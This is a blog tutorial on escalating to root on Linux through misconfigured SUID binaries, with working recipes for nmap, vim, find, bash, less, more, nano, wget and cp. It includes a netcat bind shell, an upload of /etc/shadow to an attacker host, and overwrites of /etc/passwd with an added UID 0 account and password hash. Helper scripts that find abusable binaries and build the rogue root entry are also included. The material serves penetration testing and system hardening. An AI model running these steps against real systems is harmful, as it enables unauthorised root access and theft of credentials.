Tuesday, June 18, 2019

Privilege Escalation in Linux using SUID Executables

We all know that a file has read, write and execute permissions, which we set with chmod (ownership, by contrast, is set with chown). Besides these normal permission bits, Linux has a further set of special permission bits and related access-control mechanisms:

  • SUID
  • SGID
  • Sticky Bit
  • ACLs
  • SUDO
  • SELinux

Note: This post covers only the SUID permission.

1. What is SUID?


SUID (Set User ID) is a special permission bit on an executable file. When a user runs a file that has the SUID bit set, the process runs with the effective user ID of the file's owner rather than that of the user who started it, so for the lifetime of that process the program has the owner's privileges (root, when the file is owned by root).

Sl no.   Description                          Permissions
1.       Normal permissions                   rwxrwxrwx
2.       SUID with execute permission         rwsrwxrwx
3.       SUID without execute permission      rwSrwxrwx


Reason to set SUID:

  • Example: we change our password with the passwd command, which is owned by root. To change a password, passwd has to update /etc/shadow (and, for some fields, /etc/passwd), files that a normal user cannot write. Because passwd is installed with the SUID bit set, it runs as root and can write those files on the user's behalf.

To set SUID for a file:


  • Symbolic way (s stands for Set)
    • # u+s sets the SUID bit in the owner (user) triplet
    • chmod u+s file.txt

  • Numerical/octal way (4)
    • # In 4750 the leading 4 sets the SUID bit; 7 gives the owner read, write and execute, 5 gives the group read and execute, and 0 gives others no permissions.
    • chmod 4750 file.txt

To check whether a file has the SUID bit set:

  • Use ls -l. Once SUID is set, the x in the owner's execute position is shown as s (or S, see below).

Capital 'S' in File Permission:

  • A capital "S" in the owner triplet means the SUID bit is set but the owner's execute bit is not: the file is not executable by its owner, and ls shows the bit in upper case to flag that mismatch.

Converting Capital 'S' to 's':

  • Adding the owner's execute bit turns the S into s, i.e. SUID with execute permission.
  • chmod u+x file.txt

Find all SUID Set files in linux:

  • The following command lists every file with the SUID bit (4000) set. Older guides write the mode as +4000; that form is deprecated in GNU find and rejected by current versions, so use -4000 (all of the given bits set) or /4000 (any of them) instead.
  • find / -perm -4000
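An added example, not code from the original post, that walks through the three states in the table above on a scratch file: it sets 4750, drops the owner execute bit (s becomes S), then clears the SUID bit, and at each step reads the bit back three ways: the ls -l mode string, the octal mode from stat, and the POSIX test -u. It assumes GNU coreutils (for stat -c) and a writable temp directory; the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): set, inspect and clear the
# setuid bit on a scratch file that we own. No root is needed: a file's
# owner may set the setuid bit on it with chmod.

# suid_state MODE -> prints "set", "set-noexec" or "none".
# MODE is the 10-character mode field from ls -l, e.g. "-rwsr-xr-x".
# Position 4 is the owner's execute slot: 's' = setuid + execute,
# 'S' = setuid without the owner execute bit, anything else = no setuid.
suid_state() {
    case "$1" in
        ???s*) echo set ;;
        ???S*) echo set-noexec ;;
        *)     echo none ;;
    esac
}

# mode_of FILE -> the ls -l mode field for FILE
mode_of() {
    ls -l "$1" | cut -c1-10
}

# has_suid FILE -> exit 0 if the setuid bit is set (POSIX test -u), else 1
has_suid() {
    [ -u "$1" ]
}

# demo -> one line per step: "<ls mode> <octal mode> <test -u> <state>"
# Steps: chmod 4750 (set), chmod u-x (S, no owner exec), chmod u-s (cleared).
demo() {
    f=$(mktemp) || return 1
    for step in "chmod 4750" "chmod u-x" "chmod u-s"; do
        $step "$f"
        if has_suid "$f"; then u=yes; else u=no; fi
        printf '%s %s %s %s\n' "$(mode_of "$f")" "$(stat -c %a "$f")" \
            "$u" "$(suid_state "$(mode_of "$f")")"
    done
    rm -f "$f"
}

demo
```

Running it prints "-rwsr-x--- 4750 yes set", then "-rwSr-x--- 4650 yes set-noexec", then "-rw-r-x--- 650 no none". Note that test -u reports the bit as set even in the capital-S case: the bit is there, the file just is not executable by its owner.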


2. Existing binary utilities with SUID set.

In Linux, some standard binaries and utilities can be used to escalate privileges if they have been installed with the SUID bit set. Known executables that allow this include:
  • Nmap
  • Vim
  • Find
  • Bash
  • More
  • Less
  • Nano 
  • Wget #Coolest
  • Cp

Commands that will discover all the SUID binaries:

The following commands search from / for files that have the SUID bit set and print them. Errors (mostly "Permission denied" from directories the current user cannot read) are redirected to /dev/null so that only the matching paths are shown. The first restricts the search to files owned by root; the second drops the owner filter but matches only regular files; the third prints the ls -l details of each root-owned match.
  • find / -user root -perm -4000 -print 2>/dev/null
  • find / -perm -u=s -type f 2>/dev/null
  • find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
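An added example, not part of the original post, that turns the discovery commands above into a small triage: it lists the setuid files under a directory and flags those whose name appears in the list of known-abusable utilities at the start of this section. It assumes a POSIX sh with find(1); the KNOWN list, the output format and the function names are choices made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): enumerate setuid binaries
# under a directory and flag the ones whose basename matches a utility
# known to give a shell or arbitrary file write when it runs as root.

# Names taken from the list above (vim.tiny added because that is the
# binary name on Debian-style systems). Extend as needed.
KNOWN="nmap vim vim.tiny find bash more less nano wget cp"

# find_suid DIR -> one path per line for every regular file with setuid set.
# -perm -4000 means "the 4000 bit is set", whatever the other bits are.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# is_known NAME -> exit 0 if NAME is in KNOWN, else 1
is_known() {
    for k in $KNOWN; do
        [ "$k" = "$1" ] && return 0
    done
    return 1
}

# triage DIR -> prints "FLAG <path>" for known-abusable names and
# "suid <path>" for every other setuid file found under DIR.
triage() {
    find_suid "$1" | while IFS= read -r p; do
        n=${p##*/}
        if is_known "$n"; then
            printf 'FLAG %s\n' "$p"
        else
            printf 'suid %s\n' "$p"
        fi
    done
}

# Typical use on a real host: triage / | sort
```

On a real system the FLAG lines are the first things to try; the remaining suid lines still deserve a look, since the list above is far from complete (the GTFOBins project keeps a much longer one).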

  1. Using nmap

  • This works on older versions of nmap (2.02 to 5.21), which had an interactive mode. A command prefixed with ! in that mode is run through a shell, and the shell inherits the root effective UID.
  • Open a terminal and type:
    • nmap --interactive
    • !sh
  • Rooted!!
  • Metasploit module: exploit/unix/local/setuid_nmap

  2. Using vim

  • Vim is a text editor. If it has the SUID bit set it runs with root's permissions, so it can read protected files and spawn a shell.
  • Open a terminal and type:
    • vim.tiny /etc/shadow   # to read the shadow file
    • # To get a shell:
      • vim.tiny
      • # press the ESC key
      • :set shell=/bin/sh
      • :shell
  • Rooted!!
  • Caveat: the shell option is pointed at /bin/sh because bash resets its effective UID to the real UID at startup unless it is started with -p. On systems where /bin/sh is itself bash, point the option at a shell that keeps the effective UID (dash, or bash with its -p flag).

  3. Using find

  • The find command discovers files on the system, and its -exec action runs an arbitrary command for each match. If find has the SUID bit set, those commands run with root's permissions.
  • Open a terminal and type the following:
    • touch <filename>
    • find <filename> -exec whoami \;   # prints root
    • # To get a bind shell (needs a netcat that supports -e, such as nc.traditional or ncat):
      • find <filename> -exec netcat -lvp 5555 -e /bin/sh \;
      • netcat <target ip> 5555   # on the attacker machine
  • Rooted!!

  4. Using bash

  • A SUID bash gives up its elevated effective UID on startup unless it is run in privileged mode. The -p flag keeps the effective UID, so the following command opens a shell running as root.
  • Open a terminal and type the following:
    • bash -p
  • Rooted!!

  5. Using less

  • less stops at a prompt while paging; a line starting with ! at that prompt is run through a shell, which inherits the root effective UID. As with vim, the spawned shell must not drop privileges: dash keeps them, bash needs -p.
  • Open a terminal and type the following:
    • less /etc/passwd
    • !/bin/sh
  • Rooted!!

  6. Using more

  • more accepts commands only while there is more of the file to show; if the file fits on the screen it prints it and exits. Use a file longer than the terminal (or shrink the terminal) so that the prompt appears.
  • Open a terminal and type the following:
    • more /etc/passwd
    • !/bin/sh
  • Rooted!!

  7. Using nano

  • nano is a text editor. With the SUID bit set it can write /etc/passwd, so a new account with UID 0 (root privileges) can be appended and then switched to with su. Add the following line to /etc/passwd; the second field is a crypt(3) password hash, and since the password behind this particular hash is not given here, generate your own for a password you know.
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
  • Open a terminal and type the following:
    • nano /etc/passwd
    • su touhid   # switch to the new user
  • Rooted!!

  8. Using wget

  • This is the coolest way to get root privileges: a SUID wget can overwrite any file with content fetched from the attacker, and can also send out files that it reads as root.
  • # Attacker side:
    • Copy the target's /etc/passwd file to the attacker machine.
    • Modify the file and add a user to it. To add the user, insert the following line:
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash

    • Host that file with any web server.
      • For example, using Python: python -m SimpleHTTPServer 8000
  • # Victim side:
    • wget http://192.168.56.1:8000/passwd -O /etc/passwd
    • su touhid   # switch user
  • Caveat: wget -O truncates the destination before the download starts, so a failed fetch leaves an empty /etc/passwd and locks everyone out. Fetch the file to a scratch path first to confirm the server is reachable, then overwrite.
  • To dump the shadow file (no sudo is needed, the SUID wget already reads the file as root):
    • wget --post-file=/etc/shadow http://192.168.56.1:8080
    • Set up a listener on the attacker: nc -lvp 8080
  • Rooted!!

  9. Using cp

  • A SUID cp can write to any path, so a modified copy of /etc/passwd can be copied back over the original.
  • Open a terminal and type the following:
    • cp /etc/passwd /var/www/html
    • Add a new line for the new user (the same UID 0 entry used above) to the copy.
    • cp /var/www/html/passwd /etc/passwd
    • su touhid   # change user
  • Rooted!!
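The nano, wget and cp techniques above all hinge on the same step: appending a UID 0 entry to /etc/passwd. The following is an added example, not code from the original post, that builds that entry from a password of your choosing, validates it and appends it to a copy of the file, so the step can be rehearsed before a SUID tool delivers the copy; it also counts UID 0 accounts, which is the check a defender runs to spot this. It assumes openssl with the -6 (SHA-512 crypt) option (OpenSSL 1.1.1 or later); the function names and the sample passwd contents are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): build, validate and append
# the "second root" passwd line used by the nano/wget/cp techniques, on a
# COPY of /etc/passwd, and count how many accounts carry UID 0.

# mkhash PASSWORD -> crypt(3) hash for the second passwd field.
# Prefers SHA-512 crypt ($6$); falls back to MD5 crypt ($1$) on OpenSSL
# builds that lack -6. Fails if openssl is not installed.
mkhash() {
    command -v openssl >/dev/null 2>&1 || return 1
    openssl passwd -6 "$1" 2>/dev/null || openssl passwd -1 "$1"
}

# root_entry NAME HASH -> passwd line with uid 0 / gid 0, home /root, bash shell
root_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# check_entry LINE -> exit 0 if LINE has 7 colon-separated fields and uid 0 / gid 0
check_entry() {
    n=$(printf '%s' "$1" | awk -F: '{ print NF }')
    [ "$n" = 7 ] || return 1
    [ "$(printf '%s' "$1" | cut -d: -f3)" = 0 ] || return 1
    [ "$(printf '%s' "$1" | cut -d: -f4)" = 0 ] || return 1
}

# add_root_user FILE NAME HASH -> append the entry to FILE (a copy of
# /etc/passwd). Refuses an empty hash (that would be a password-less root)
# and a NAME that already exists in FILE.
add_root_user() {
    file=$1; name=$2; hash=$3
    [ -n "$hash" ] || { echo "refusing empty hash" >&2; return 1; }
    if grep -q "^$name:" "$file"; then
        echo "user $name already present" >&2
        return 1
    fi
    line=$(root_entry "$name" "$hash")
    check_entry "$line" || return 1
    printf '%s\n' "$line" >> "$file"
}

# count_root_uids FILE -> number of accounts with uid 0 (more than 1 is suspicious)
count_root_uids() {
    awk -F: '$3 == 0 { n++ } END { print n + 0 }' "$1"
}

# Rehearsal on a constructed sample, not a real passwd file.
tmp=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$tmp"
if h=$(mkhash 'password'); then
    add_root_user "$tmp" touhid "$h" && cat "$tmp"
    echo "accounts with uid 0: $(count_root_uids "$tmp")"
fi
rm -f "$tmp"
```

Once the copy looks right, it is the copy that a SUID wget fetches over /etc/passwd or a SUID cp copies back; su touhid then works with the password you hashed. On the defensive side, count_root_uids run against the real /etc/passwd returning anything other than 1 is a strong indicator that this technique has been used.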
Thus a misconfigured SUID binary can be used to escalate privileges. Administrators should therefore review every SUID binary and ask whether it really needs to run with the permissions of an elevated user, paying particular attention to applications that can execute commands or write arbitrary data on the system.
